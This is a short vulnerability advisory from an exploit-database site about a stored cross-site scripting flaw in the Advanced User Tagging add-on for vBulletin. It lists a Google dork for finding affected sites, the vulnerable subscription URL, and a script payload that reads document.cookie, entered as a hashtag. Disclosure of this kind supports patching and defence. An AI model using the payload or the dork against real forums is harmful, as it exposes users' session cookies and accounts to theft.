Advanced User Tagging vBulletin Stored XSS Vulnerability

2013-07-10 / 2013-07-24
Credit: []0iZy5
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

############################################## # # Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability # Google Dork: intext:usertag_pro # Date: 10.07.2013 # Exploit Author: []0iZy5 # Vendor Homepage: www.backtrack-linux.ro # Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product # Version: vBulletin 3.8.x, vBulletin 4.x.x # Tested on: Linux & Windows # ############################################## # # Stage 1: Go to -> UserCP -> Hash Tag Subscriptions # (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription # # Stage 2: Add a malicious hash tag. # (Example:) "><script>alert(document.cookie)</script> # ############################################## # # This was written for educational purpose only. use it at your own risk. # Author will be not responsible for any damage caused! user assumes all responsibility. # Intended for authorized web application pentesting only! # ##############################################

References:

http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product
http://www.backtrack-linux.ro


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top